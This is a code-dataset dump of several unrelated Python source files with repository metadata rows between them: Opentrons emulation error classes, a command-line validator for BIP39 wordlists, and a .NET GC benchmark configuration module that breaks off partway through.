plt.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.show()
plot_sample(X.sample(n=1))
"""
| 28.985366
| 79
| 0.610401
|
7f0833abf1d427faf9adfed4404f5d616cae8b17
| 4,065
|
py
|
Python
|
emulation_system/emulation_system/compose_file_creator/errors.py
|
Opentrons/opentrons-emulation
|
aee3b362ef47190b35a1a99d040f5d87800e740b
|
[
"Apache-2.0"
] | 3
|
2022-02-15T23:58:01.000Z
|
2022-03-17T19:32:15.000Z
|
emulation_system/emulation_system/compose_file_creator/errors.py
|
Opentrons/opentrons-emulation
|
aee3b362ef47190b35a1a99d040f5d87800e740b
|
[
"Apache-2.0"
] | 23
|
2021-11-17T17:55:22.000Z
|
2022-03-29T19:15:20.000Z
|
emulation_system/emulation_system/compose_file_creator/errors.py
|
Opentrons/opentrons-emulation
|
aee3b362ef47190b35a1a99d040f5d87800e740b
|
[
"Apache-2.0"
] | null | null | null |
"""One-stop shop for all errors."""
from typing import List, Set
from emulation_system.compose_file_creator.settings.config_file_settings import Hardware
class MountError(Exception):
"""Base mount exception."""
...
class NoMountsDefinedError(MountError):
"""Exception thrown when you try to load a mount and none are defined."""
def __init__(self) -> None:
super().__init__("You have no mounts defined.")
class MountNotFoundError(MountError):
"""Exception thrown when mount of a certain name is not found."""
def __init__(self, name: str) -> None:
super().__init__(f'Mount named "{name}" not found.')
class EmulationLevelNotSupportedError(Exception):
"""Exception thrown when emulation level is not supported."""
def __init__(self, emulation_level: str, hardware: str) -> None:
super().__init__(
f'Emulation level, "{emulation_level}" not supported for "{hardware}"'
)
class LocalSourceDoesNotExistError(Exception):
"""Exception thrown when local source-location does not exist."""
def __init__(self, path: str) -> None:
super().__init__(f'"{path}" is not a valid directory path')
class InvalidRemoteSourceError(Exception):
"""Exception thrown when remote source is not valid."""
def __init__(self, value: str) -> None:
super().__init__(
f'"{value}" is not valid. Must either be a valid commit sha, or the '
f'value "latest"'
)
class DuplicateHardwareNameError(Exception):
"""Exception thrown when there is hardware with duplicate names."""
def __init__(self, duplicate_names: Set[str]) -> None:
super().__init__(
"The following container names are duplicated in the configuration file: "
f"{', '.join(duplicate_names)}"
)
class ImageNotDefinedError(Exception):
"""Exception thrown when there is no image defined for specified emulation level/source type.""" # noqa: E501
def __init__(self, emulation_level: str, source_type: str, hardware: str) -> None:
super().__init__(
f'Image with emulation level of "{emulation_level}" and source type '
f'"{source_type}" does not exist for {hardware}'
)
class IncorrectHardwareError(Exception):
"""Exception thrown when incorrect hardware is specified."""
def __init__(
self, specifed_hardware: Hardware, expected_hardware: Hardware
) -> None:
super().__init__(
f"Incorrect hardware specifed: {specifed_hardware}. "
f"Expected: {expected_hardware}"
)
class HardwareDoesNotExistError(Exception):
"""Exception thrown when hardware does not exist."""
def __init__(self, specified_hardware: Hardware) -> None:
super().__init__(f"{specified_hardware} not defined.")
class RepoDoesNotExistError(Exception):
"""Exception thrown when repo does not exist."""
def __init__(self, repo_name: str) -> None:
super().__init__(f'Repo "{repo_name}" does not exist.')
class ServiceDoesNotExistError(Exception):
"""Exception thrown when Robot Server does not exist."""
def __init__(self, service_name: str) -> None:
super().__init__(
f"You do not have a {service_name} in your generated configuration."
)
class NotRemoteOnlyError(Exception):
"""Exception thrown when not any robot or module is not of remote source-type."""
def __init__(self) -> None:
super().__init__(
'Not all source-type parameters for passed system are "remote".'
)
class InvalidFilterError(Exception):
"""Exception thrown when Robot Server does not exist."""
def __init__(self, filter_name: str, valid_filters: List[str]) -> None:
valid_names = "\n\t".join(valid_filters)
valid_not_names = "\n\tnot-".join(valid_filters)
super().__init__(
f'\n\nFilter name "{filter_name}" is invalid.\n'
f"Valid filter names are \n\t{valid_names}\n\n\tnot-{valid_not_names}\n"
)
| 31.757813
| 114
| 0.664207
|
5e7d3cac92a1a0f1bb8d7e3cd2e7224b16a485de
| 13,741
|
py
|
Python
|
bip39validator/__main__.py
|
ZenulAbidin/bip39validator
|
b78f2db6f46b56b408eef3a51e921e96247a9b46
|
[
"MIT"
] | 3
|
2021-02-11T20:37:56.000Z
|
2021-06-11T03:29:15.000Z
|
bip39validator/__main__.py
|
ZenulAbidin/bip39validator
|
b78f2db6f46b56b408eef3a51e921e96247a9b46
|
[
"MIT"
] | 4
|
2020-10-04T23:11:08.000Z
|
2020-12-23T00:32:52.000Z
|
bip39validator/__main__.py
|
ZenulAbidin/bip39validator
|
b78f2db6f46b56b408eef3a51e921e96247a9b46
|
[
"MIT"
] | null | null | null |
# BIP39 Wordlist Validator - A tool to validate BIP39 wordlists in Latin
# languages.
# __main__.py: Main program
# Copyright 2020 Ali Sherief
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import argparse
import pdb
import validators
from os.path import abspath
from bip39validator.InvalidWordList import InvalidWordList
from bip39validator.ValidationFailed import ValidationFailed
from bip39validator.BIP39WordList import BIP39WordList
from bip39validator.internal.logging import setargs, progressbar, logerror, loginfo, \
logdefault, separator, logwarning
from bip39validator.__version__ import __version__
default_lev = 2
default_init_uniq = 4
default_max_length = 8
def version_str():
return """BIP39 Validator {}
Copyright (C) 2020 Ali Sherief
License: MIT License <https://opensource.org/licenses/MIT>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Written by Ali Sherief.""".format(__version__)
def abort(debug):
if log_file:
log_file.close()
if debug:
logerror("Debug mode on, entering pdb")
pdb.set_trace()
exit(1)
else:
logerror("Aborting")
exit(1)
def check_validity_warnings(validity):
if not validity.is_sorted:
logwarning('Wordlist is not sorted. It is recommended to sort the wordlist \
before publishing it.')
if not validity.has_2048_words:
logwarning('Wordlist has {} words. Exactly 2048 words are needed to map \
each word to an 11-bit value 1-to-1.'.format(validity.num_words))
def handle_invalid_wordlist(args, e):
if args.nosane:
return
check_validity_warnings(e)
for l in e.err_lines:
logerror("Word \"{}\" (line{}) has a non-lowercase character\
or is blank (Did you remove whitespace and empty lines?)".format(l.word, l.line))
logerror("Valid characters test failed")
logerror("Cannot perform additional tests")
abort(args.debug)
log_file = None
args = None
def main():
log_file = None
try:
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,
description='BIP39 wordlist validator')
parser.add_argument('input', type=str, help='path to the input file')
parser.add_argument('-d', '--min-levenshtein-distance', dest='lev_dist',
default=default_lev, type=int, help='set the minimum required \
Levenshtein distance between words (default: {})'.format(default_lev))
parser.add_argument('-u', '--max-initial-unique', dest='init_uniq',
default=default_init_uniq, type=int, help='set the maximum \
required unique initial characters between words (default: {})'.format(
default_init_uniq))
parser.add_argument('-l', '--max-length', dest='max_length',
default=default_max_length, type=int, help='set the maximum length of \
each word (default: {})'.format(default_max_length))
parser.add_argument('-D', '--no-levenshtein-distance', dest='no_lev_dist',
help='do not run the Levenshtein distance test', action='store_true')
parser.add_argument('-U', '--no-initial-unique', dest='no_init_uniq',
help='do not run the unique initial characters test',
action='store_true')
parser.add_argument('-L', '--no-max-length', dest='no_max_length',
help='do not run the maximum length test', action='store_true')
parser.add_argument('-o', '--output-file', type=str, dest='output',
help='logs all console output to an additional file')
parser.add_argument('-a', '--ascii', dest='ascii',
help='turn off rich text formatting and progress bars for console \
output', action='store_true')
parser.add_argument('-q', '--quiet', dest='quiet',
help='do not display details of test failures, only whether they \
succeeded or failed', action='store_true')
parser.add_argument('--nosane', dest='nosane', action='store_true',
help='Suppress wordlist sanity check. This might cause other tests to fail.')
parser.add_argument('--debug', dest='debug', action='store_true',
help='turn on debugging mode (intended for developers)')
parser.add_argument('--pycharm-debug', dest='pycharm_debug', action='store_true',
help='re-raise exceptions out of main() to Pycharm (intended for developers)')
parser.add_argument('-v', '--version', action='version',
version=version_str())
args = parser.parse_args()
# If there is an output file, then attempt to open it.
if args.output:
try:
absout = abspath(args.output)
# Set the ascii flag if desired before printing this
setargs(None, args)
logdefault("Attempting to open log file {} for writing".format(absout))
log_file = open(absout, 'w')
setargs(log_file, args)
except OSError as e:
logerror("open {} for writing failed: {}".format(e.filename,
e.strerror))
abort(args.debug)
else:
setargs(None, args)
# Now validate the parameters
if args.lev_dist <= 0:
logerror("Invalid value for --min-levenshtein-distance {}".format(
args.lev_dist))
abort(args.debug)
if args.init_uniq <= 0:
logerror("Invalid value for --min-initial-unique {}".format(
args.init_uniq))
abort(args.debug)
if args.max_length <= 0:
logerror("Invalid value for --max-length {}".format(
args.max_length))
abort(args.debug)
try:
valid_url = validators.url(args.input)
if valid_url:
kwargs = {'url': args.input}
logdefault("Reading wordlist URL {}".format(args.input))
else:
f = open(args.input)
kwargs = {'handle': f}
logdefault("Reading wordlist file {}".format(args.input))
try:
bip39 = BIP39WordList(desc=f"{args.input}", **kwargs)
loginfo("{} words read".format(len(bip39)))
except InvalidWordList as e:
handle_invalid_wordlist(args, e)
if not valid_url:
f.close()
except OSError as e:
logerror("Cannot read {}: {}".format(e.filename,
e.strerror))
abort(args.debug)
tally = 0
total = 4 - int(args.no_lev_dist) - int(args.no_init_uniq)\
- int(args.no_max_length)
logdefault("Checking wordlist for invalid characters")
try:
tup = bip39._test_lowercase_1()
kwargs = tup[3]
kwargs = progressbar('Looking for invalid characters', tup[0],
tup[1], tup[2], **kwargs)
validity = bip39._test_lowercase_2(kwargs)
check_validity_warnings(validity)
tally += 1
loginfo("Valid characters test succeeded")
except InvalidWordList as e:
handle_invalid_wordlist(args, e)
if args.nosane:
logwarning("Valid characters test failed, but --nosane passed; ignoring error")
logdefault("Finished checking wordlist for invalid characters")
separator()
if not args.no_lev_dist:
logdefault("Performing Levenshtein distance test")
try:
tup = bip39._test_lev_distance_1(n=args.lev_dist)
kwargs = tup[3]
kwargs = progressbar('Computing Levenshtein distance', tup[0],
tup[1], tup[2], **kwargs)
bip39._test_lev_distance_2(kwargs)
loginfo("No word pairs with Levenshtein distance less than {}" \
.format(args.lev_dist))
tally += 1
loginfo("Levenshtein distance test succeeded")
except ValidationFailed as e:
lev_dist = e.status_obj
word_pairs = lev_dist.getwordpairs_lt()
logerror("{} word pairs with Levenshtein distance less than {}\n" \
.format(len(word_pairs), args.lev_dist))
for i in range(1, args.lev_dist):
words_list = [*zip(lev_dist.getwordpairs_eq(i), lev_dist.getlinepairs_eq(i))]
logerror("{} word pairs with Levenshtein distance *equal* to {}:" \
.format(len(words_list), i))
for words, lines in words_list:
logerror(" \"{}\" (line {}) <--> \"{}\" (line {})" \
.format(words[0], lines[0], words[1], lines[1]))
logerror("")
logerror("{} total words below minimum Levenshtein distance".format(len(
word_pairs)))
logerror("Levenshtein distance test failed")
logdefault("Finished performing Levenshtein distance test")
separator()
if not args.no_init_uniq:
logdefault("Performing unique initial characters test")
try:
tup = bip39._test_initial_chars_1(n=args.init_uniq)
kwargs = tup[3]
kwargs = progressbar('Checking initial characters', tup[0],
tup[1], tup[2], **kwargs)
bip39._test_initial_chars_2(kwargs)
loginfo("All words are unique to {} initial characters".format(args.init_uniq))
tally += 1
loginfo("Unique initial characters test succeeded")
except ValidationFailed as e:
similar = e.status_obj
# Filter out groups with just one word in them as those are unique
groups = similar.groups_length(args.init_uniq)
logerror("{} groups of similar words (by {} initial characters)\n" \
.format(len(groups.items()), args.init_uniq))
for pre, group in groups.items():
logerror("Similar words with prefix \"{}\":".format(pre))
for wordline in group:
logerror(" \"{}\" (line {})".format(wordline[0], wordline[1]))
logerror("")
logerror("{} total similar words".format(len(groups.keys())))
logerror("Unique initial characters test failed")
logdefault("Finished unique initial characters test")
separator()
if not args.no_max_length:
logdefault("Performing maximum word length test")
try:
tup = bip39._test_max_length_1(n=args.max_length)
kwargs = tup[3]
kwargs = progressbar('Checking length', tup[0],
tup[1], tup[2], **kwargs)
bip39._test_max_length_2(kwargs)
loginfo("Length of all words are {} chracters or less".format(args.max_length))
tally += 1
loginfo("Maximum word length test succeeded")
except ValidationFailed as e:
lengths = e.status_obj
words = lengths.getwords_gt(args.max_length)
lines = lengths.getlines_gt(args.max_length)
logerror("Words longer than {} characters:".format(args.max_length))
for word, line in [*zip(words, lines)]:
logerror(" \"{}\" (line {})".format(word, line))
logerror("{} words longer than {} characters".format(len(lengths),
args.max_length))
logerror("Maximum word length test failed")
logdefault("Finished maximum word length test")
separator()
logdefault("{} of {} checks passed".format(tally, total))
if log_file:
log_file.close()
exit(0)
except Exception as e:
print("Got unknown exception {}: {}".format(type(e), str(e)))
if args.pycharm_debug:
raise e
else:
abort(args.debug)
if __name__ == "__main__":
main()
| 46.265993
| 106
| 0.582345
|
337818a37dd469363db2a54f88cfa5b3a3c50d1b
| 44,815
|
py
|
Python
|
src/benchmarks/gc/src/commonlib/bench_file.py
|
yuchong-pan/performance
|
be6e084cd07598c9276baecf6abb91d0d78e734c
|
[
"MIT"
] | null | null | null |
src/benchmarks/gc/src/commonlib/bench_file.py
|
yuchong-pan/performance
|
be6e084cd07598c9276baecf6abb91d0d78e734c
|
[
"MIT"
] | null | null | null |
src/benchmarks/gc/src/commonlib/bench_file.py
|
yuchong-pan/performance
|
be6e084cd07598c9276baecf6abb91d0d78e734c
|
[
"MIT"
] | null | null | null |
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the MIT license.
# See the LICENSE file in the project root for more information.
"""
A 'foo.yaml' file stores a specification of the tests to run.
These may be generated by the `generate` command of `run_tests.py`, see documentation there.
"""
from dataclasses import dataclass, fields
from enum import Enum
from pathlib import Path
from platform import machine as platform_machine
from typing import cast, Iterable, Mapping, Optional, Sequence, Tuple, Type, Union
from overrides import overrides
from .collection_util import (
combine_mappings,
empty_mapping,
filter_not_none,
find_only_or_only_matching,
is_empty,
optional_mapping,
)
from .option import map_option, non_null, optional_to_iter, option_or, option_or_3
from .parse_and_serialize import HexInt, load_yaml, SerializeMappings, write_yaml_file
from .score_spec import ScoreSpec
from .type_utils import (
combine_dataclasses_with_optional_fields,
doc_field,
get_field_info_from_name,
OrderedEnum,
with_slots,
)
from .util import (
add_extension,
assert_is_percent,
get_existing_absolute_file_path,
get_hostname,
get_os,
hex_no_0x,
OS,
remove_str_start,
try_remove_str_end,
try_remove_str_start,
)
@with_slots
@dataclass(frozen=True)
class GCPerfSimResult:
"""See `PrintResult` in GCPerfSim.cs"""
seconds_taken: float
num_created_with_finalizers: int
num_finalized: int
final_total_memory_bytes: int
# Indexed by generation (0-2)
collection_counts: Tuple[int, int, int]
# missing on older .NET versions
final_heap_size_bytes: Optional[int] = None
final_fragmentation_bytes: Optional[int] = None
@doc_field("memory_mb", "Size of the container in mebibytes.")
@doc_field("cpu_rate_hard_cap", "This allows fractional amounts, e.g. 2.5.")
@doc_field("image_name", "Not yet implemented. This would be the name of a docker container.")
@with_slots
@dataclass(frozen=True)
class TestConfigContainer:
"""
Options for running the test in a container.
A container is a cgroup, or a job object on windows.
Docker containers are not yet implemented.
"""
memory_mb: Optional[float] = None
cpu_rate_hard_cap: Optional[float] = None
image_name: Optional[str] = None
def __post_init__(self) -> None:
mb = self.memory_mb
if mb is not None:
assert 1 <= mb <= 100000
cpu = self.cpu_rate_hard_cap
if cpu is not None:
assert 0 < cpu <= 1
@doc_field(
"percent",
"The memory load process will allocate memory until the system's memory load is this high.",
)
@doc_field(
"no_readjust",
"""
If true, the memory load process will never allocate or free any more memory after it's started.
If false, it will allocate or free in order to keep the system's memory at `percent`.
""",
)
@with_slots
@dataclass(frozen=True)
class MemoryLoadOptions:
percent: float
no_readjust: Optional[bool] = None
def __post_init__(self) -> None:
assert_is_percent(self.percent)
@doc_field("complus_gcserver", "Set to true to use server GC.")
@doc_field("complus_gcconcurrent", "Set to true to allow background GCs.")
@doc_field("complus_gcgen0size", "gen0size in bytes. (decimal)")
@doc_field("complus_gcgen0maxbudget", "Max gen0 budget in bytes. (decimal)")
@doc_field(
"complus_gcheapaffinitizeranges",
"""
On non-Windows, this should look like: 1,3,5,7-9,12
On Windows, this should include group numbers, like: 0:1,0:3,0:5,1:7-9,1:12
""",
)
@doc_field(
"complus_gcheapcount",
"""
Number of heaps. (decimal)
Only has effect when complus_gcserver is set.
""",
)
@doc_field("complus_gcheaphardlimit", "Hard limit on heap size, in bytes. (decimal)")
@doc_field(
"complus_gcheaphardlimitsoh", "Hard limit on small object heap size, in bytes. (decimal)"
)
@doc_field(
"complus_gcheaphardlimitloh", "Hard limit on large object heap size, in bytes. (decimal)"
)
@doc_field(
"complus_gcheaphardlimitpoh", "Hard limit on pinned object heap size, in bytes. (decimal)"
)
@doc_field("complus_gclargepages", "Set to true to enable large pages.")
@doc_field("complus_gcnoaffinitize", "Set to true to prevent affinitizing GC threads to cpu cores.")
@doc_field("complus_gccpugroup", "Set to true to enable CPU groups.")
@doc_field("complus_gcnumaaware", "Set to false to disable NUMA-awareness in GC")
@doc_field(
"complus_thread_useallcpugroups",
"Set to true to automatically distribute threads across CPU Groups",
)
@doc_field(
"complus_threadpool_forcemaxworkerthreads",
"Overrides the MaxThreads setting for the ThreadPool worker pool",
)
@doc_field("complus_tieredcompilation", "Set to true to enable tiered compilation")
@doc_field(
"complus_bgcfltuningenabled",
"Set to true to enable https://github.com/dotnet/coreclr/pull/26695",
)
@doc_field("complus_bgcmemgoal", "See comment on https://github.com/dotnet/coreclr/pull/26695")
@doc_field("complus_bgcmemgoalslack", "See comment on https://github.com/dotnet/coreclr/pull/26695")
@doc_field(
"complus_gcconcurrentfinalization",
"Enable concurrent finalization (not available in normal coreclr builds)",
)
@doc_field(
"container",
"""
Set to run the test in a container.
A container is a job object on Windows, or cgroups / docker container on non-Windows.
""",
)
@doc_field(
"affinitize",
"""
If true, this will be run in a job object affinitized to a single core.
Only works on Windows.
See `run_in_job.c`'s `--affinitize` option.
""",
)
@doc_field(
"memory_load",
"If set, the test runner will launch a second process that ensures "
+ "this percentage of the system's memory is consumed.",
)
@with_slots
@dataclass(frozen=True)
class ConfigOptions:
complus_gcserver: Optional[bool] = None
complus_gcconcurrent: Optional[bool] = None
# This is in bytes
complus_gcgen0size: Optional[int] = None
complus_gcgen0maxbudget: Optional[int] = None
complus_gcheapaffinitizeranges: Optional[str] = None
complus_gcheapcount: Optional[int] = None
complus_gcheaphardlimit: Optional[int] = None
complus_gcheaphardlimitsoh: Optional[int] = None
complus_gcheaphardlimitloh: Optional[int] = None
complus_gcheaphardlimitpoh: Optional[int] = None
complus_gclargepages: Optional[bool] = None
complus_gcnoaffinitize: Optional[bool] = None
complus_gccpugroup: Optional[bool] = None
complus_gcnumaaware: Optional[bool] = None
complus_thread_useallcpugroups: Optional[bool] = None
complus_threadpool_forcemaxworkerthreads: Optional[int] = None
complus_tieredcompilation: Optional[bool] = None
complus_bgcfltuningenabled: Optional[bool] = None
complus_bgcmemgoal: Optional[int] = None
complus_bgcmemgoalslack: Optional[int] = None
complus_gcconcurrentfinalization: Optional[bool] = None
container: Optional[TestConfigContainer] = None
affinitize: Optional[bool] = None
memory_load: Optional[MemoryLoadOptions] = None
def __post_init__(self) -> None:
if self.complus_gcheapaffinitizeranges is not None:
_parse_heap_affinitize_ranges(self.complus_gcheapaffinitizeranges)
@doc_field(
"coreclr_specific",
"""
Maps coreclr name to config options for only that coreclr.
If present, should have an entry for every coreclr.
""",
)
@with_slots
@dataclass(frozen=True)
class Config(ConfigOptions):
"""
Allows to set environment variables, and container and memory load options.
WARN: Normally complus environment variables are specified in hexadecimal on the command line.
But when specifying them in a yaml file, use decimal.
"""
coreclr_specific: Optional[Mapping[str, ConfigOptions]] = None
# Remember to update TestConfigCombined.env when adding a new field
@staticmethod
def serialize_mappings() -> SerializeMappings:
def f(x: Optional[int]) -> Optional[HexInt]:
return map_option(x, HexInt)
return {field.name: f for field in fields(Config) if field.type is int}
def to_str_pretty(self) -> str:
return ", ".join(
# NOTE: not using isinstance(value, int) because apparently bools are ints
f"{field.name}={hex(value) if field.type is int else str(value)}"
for field in fields(Config)
for value in (getattr(self, field.name),)
if value is not None
)
@with_slots
@dataclass(frozen=True)
class HeapAffinitizeRange:
group: Optional[int]
# both inclusive
lo: int
hi: int
def __post_init__(self) -> None:
assert self.lo <= self.hi
@with_slots
@dataclass(frozen=True)
class HeapAffinitizeRanges:
ranges: Sequence[HeapAffinitizeRange]
def _parse_heap_affinitize_ranges(s: str) -> HeapAffinitizeRanges:
# Based on 'ParseGCHeapAffinitizeRanges' in gcconfig.cpp
# The cpu index ranges is a comma separated list of indices or ranges of indices (e.g. 1-5).
# Example 1,3,5,7-9,12
parts = s.split(",")
ranges = [_parse_heap_affinitize_range(part) for part in parts]
_assert_sorted_and_non_overlapping(ranges)
return HeapAffinitizeRanges(ranges)
def _assert_sorted_and_non_overlapping(ranges: Sequence[HeapAffinitizeRange]) -> None:
prev = -1
for r in ranges:
assert r.lo > prev
prev = r.hi
def _parse_heap_affinitize_range(s: str) -> HeapAffinitizeRange:
if ":" in s:
l, r = s.split(":", 1)
return _parse_heap_affinitize_range_after_group(int(l), r)
else:
return _parse_heap_affinitize_range_after_group(None, s)
def _parse_heap_affinitize_range_after_group(group: Optional[int], s: str) -> HeapAffinitizeRange:
if "-" in s:
l, r = s.split("-", 1)
return HeapAffinitizeRange(group=group, lo=int(l), hi=int(r))
else:
x = int(s)
return HeapAffinitizeRange(group=group, lo=x, hi=x)
@with_slots
@dataclass(frozen=True)
class TestConfigCombinedWithCoreclr:
"""
This is the combination of:
* common_config
* a particular config
* coreclr_specific for that config
"""
cfg: ConfigOptions
def __post_init__(self) -> None:
cfg = self.cfg
assert (cfg.complus_gcheapaffinitizeranges is not None) == (
cfg.complus_gccpugroup == True
), (
"Either both complus_gcheapaffinitizeranges and complus_gccpugroup should be set,"
+ " or neither should"
)
if cfg.complus_bgcmemgoal or cfg.complus_bgcmemgoalslack:
assert (
cfg.complus_bgcfltuningenabled
), "bgcmemgoal does nothing without bgcfltuningenabled"
if cfg.complus_gcconcurrentfinalization:
assert (
cfg.complus_gcconcurrent
), "gcconcurrentfinalization only has effect if gcconcurrent"
def env(self, core_root: Optional[Path]) -> Mapping[str, str]:
cfg = self.cfg
def od(name: str, v: Optional[int]) -> Optional[Mapping[str, str]]:
return optional_mapping(name, map_option(v, hex_no_0x))
def ob(name: str, v: Optional[bool]) -> Optional[Mapping[str, str]]:
return optional_mapping(name, map_option(v, lambda b: str(int(b))))
return combine_mappings(
empty_mapping() if core_root is None else {"CORE_ROOT": str(core_root)},
*filter_not_none(
(
ob("COMPlus_gcServer", cfg.complus_gcserver),
ob("COMPlus_gcConcurrent", cfg.complus_gcconcurrent),
od("COMPlus_GCgen0size", cfg.complus_gcgen0size),
od("COMPlus_GCGen0MaxBudget", cfg.complus_gcgen0maxbudget),
optional_mapping(
"COMPlus_GCHeapAffinitizeRanges", cfg.complus_gcheapaffinitizeranges
),
od("COMPlus_GCHeapCount", cfg.complus_gcheapcount),
od("COMPlus_GCHeapHardLimit", cfg.complus_gcheaphardlimit),
od("COMPlus_GCHeapHardLimitSOH", cfg.complus_gcheaphardlimitsoh),
od("COMPlus_GCHeapHardLimitLOH", cfg.complus_gcheaphardlimitloh),
od("COMPlus_GCHeapHardLimitPOH", cfg.complus_gcheaphardlimitpoh),
ob("COMPlus_GCLargePages", cfg.complus_gclargepages),
ob("COMPlus_GCNoAffinitize", cfg.complus_gcnoaffinitize),
ob("COMPlus_GCCpuGroup", cfg.complus_gccpugroup),
ob("COMPlus_GCNumaAware", cfg.complus_gcnumaaware),
ob("COMPlus_Thread_UseAllCpuGroups", cfg.complus_thread_useallcpugroups),
od(
"COMPlus_ThreadPool_ForceMaxWorkerThreads",
cfg.complus_threadpool_forcemaxworkerthreads,
),
ob("COMPlus_TieredCompilation", cfg.complus_tieredcompilation),
ob("COMPlus_BGCFLTuningEnabled", cfg.complus_bgcfltuningenabled),
od("COMPlus_BGCMemGoal", cfg.complus_bgcmemgoal),
od("COMPlus_BGCMemGoalSlack", cfg.complus_bgcmemgoalslack),
ob("COMPLUS_GCConcurrentFinalization", cfg.complus_gcconcurrentfinalization),
)
),
)
# Combined CommonConfig and individual test's config
@with_slots
@dataclass(frozen=True)
class TestConfigCombined:
cfg: Config # includes coreclr_specific
@property
def container(self) -> Optional[TestConfigContainer]:
return self.cfg.container
@property
def affinitize(self) -> Optional[bool]:
return self.cfg.affinitize
@property
def complus_gcheapcount(self) -> Optional[int]:
return self.cfg.complus_gcheapcount
@property
def complus_gcserver(self) -> Optional[bool]:
return self.cfg.complus_gcserver
@property
def memory_load(self) -> Optional[MemoryLoadOptions]:
return self.cfg.memory_load
def with_coreclr(self, coreclr_name: str) -> TestConfigCombinedWithCoreclr:
specific = option_or(
map_option(self.cfg.coreclr_specific, lambda cs: cs.get(coreclr_name)), ConfigOptions()
)
return TestConfigCombinedWithCoreclr(
combine_dataclasses_with_optional_fields(ConfigOptions, self.cfg, specific)
)
@with_slots
@dataclass(frozen=True)
class PartialConfigAndName:
name: str
config: Config
def to_tuple(self) -> Tuple[str, Config]:
return self.name, self.config
@with_slots
@dataclass(frozen=True)
class FullConfigAndName:
name: str
config: TestConfigCombined
@property
def as_partial(self) -> PartialConfigAndName:
return PartialConfigAndName(self.name, self.config.cfg)
@doc_field("none", "Do not collect any trace events.")
@doc_field("gc", "Collect normal GC events.")
@doc_field("verbose", "Collect verbose GC events, which includes join events.")
@doc_field("cpu_samples", "Collect all of the above, and CPU samples.")
@doc_field(
"thread_times",
"Collect all of the above and Thread Times Stacks with CSwitch events. Windows only.",
)
class CollectKind(OrderedEnum):
none = 0
gc = 1
verbose = 2
cpu_samples = 3
thread_times = 4
def doc_enum(e: Type[Enum]) -> str:
def part(member: str) -> Optional[str]:
info = get_field_info_from_name(e, member)
return None if info.hidden else f"{member}: {info.doc}"
return "\n".join(p for member in e for p in optional_to_iter(part(member.name)))
@with_slots
@dataclass(frozen=True)
class LogOptions:
"""
Options for enabling 'dprintf' statements from gc.cpp.
You'll need to modify coreclr too for this to work.
This slows the process down, so not recommended for performance testing.
"""
file_size_mb: int
@doc_field(
"collect",
f"""
Kind of events to collect.
Defaults to 'gc'.
{doc_enum(CollectKind)}
""",
)
@doc_field(
"default_iteration_count",
"""
Number of times to run the same test combination.
"Defaults to 1.
"Without this you will not get stdev.
""",
)
@doc_field(
"default_min_seconds",
"""
If a test is over in less than this many seconds, the test runner will throw an exception.
This ensures that tests have sufficient data for performance analysis.
May be overridden by Benchmark#min_seconds
""",
)
@doc_field(
"default_max_seconds",
"""
The test runner will stop a process that goes longer than this and fail.
May be overridden by Benchmark#max_seconds.
""",
)
@doc_field(
"max_trace_size_gb",
"""
If the trace exceeds this size, old events will be discarded.
Defaults to 1.
""",
)
@doc_field(
"dotnet_path",
"""
Custom 'dotnet' path to use when building.
Does not affect running.
""",
)
@doc_field(
"dotnet_trace_path",
"""
Set this in case dotnet-trace is not in PATH.
Useful for tests that must be run as super user.
""",
)
@doc_field(
"dotnet_trace_buffersize_mb",
"""
Value to pass to `--buffersize` argument of dotnet-trace, in MB.
Default is dotnet-trace's default, currently 256MB.
""",
)
@doc_field(
"always_use_dotnet_trace",
"""
Always use dotnet-trace to collect traces, even on Windows where PerfView is the default.
Has no effect on non-Windows.
Has no effect if `collect` is `none`.
""",
)
@doc_field("log", "Options for enabling dprintf logging", hidden=True)
@with_slots
@dataclass(frozen=True)
class BenchOptions:
# Not putting the default (CollectKind.gc) here
# as that would mean the property would be created when serializing.
collect: Optional[CollectKind] = None
# Defaults to 1
default_iteration_count: Optional[int] = None
default_min_seconds: Optional[float] = None
default_max_seconds: Optional[float] = None
max_trace_size_gb: Optional[float] = None
dotnet_path: Optional[Path] = None
dotnet_trace_path: Optional[Path] = None
dotnet_trace_buffersize_mb: Optional[int] = None
always_use_dotnet_trace: Optional[bool] = None
log: Optional[LogOptions] = None
def __post_init__(self) -> None:
assert self.default_iteration_count is None or self.default_iteration_count >= 1
@property
def get_collect(self) -> CollectKind:
return option_or(self.collect, CollectKind.gc)
class AllocType(Enum):
simple = 0
reference = 1
class TestKind(Enum):
time = 0
highSurvival = 1
# Not documenting fields here as GCPerfSim should do that.
@doc_field("tc", None)
@doc_field("tagb", None)
@doc_field("tlgb", None)
@doc_field("totalMins", None)
@doc_field("lohar", None)
@doc_field("sohsi", None)
@doc_field("lohsi", None)
@doc_field("pohsi", None)
@doc_field("sohpi", None)
@doc_field("lohpi", None)
@doc_field("pohpi", None)
@doc_field("sohfi", None)
@doc_field("lohfi", None)
@doc_field("pohfi", None)
@doc_field("allocType", None)
@doc_field("testKind", None)
@with_slots
@dataclass(frozen=True)
class GCPerfSimArgs:
"""
Represents the arguments to GCPerfSim.
Read the GCPerfSim source for documentation.
"""
tc: int
tagb: float
tlgb: float
totalMins: Optional[float] = None
lohar: int = 0
sohsi: int = 0
lohsi: int = 0
pohsi: int = 0
sohpi: int = 0
lohpi: int = 0
pohpi: int = 0
sohfi: int = 0
lohfi: int = 0
pohfi: int = 0
allocType: AllocType = AllocType.reference
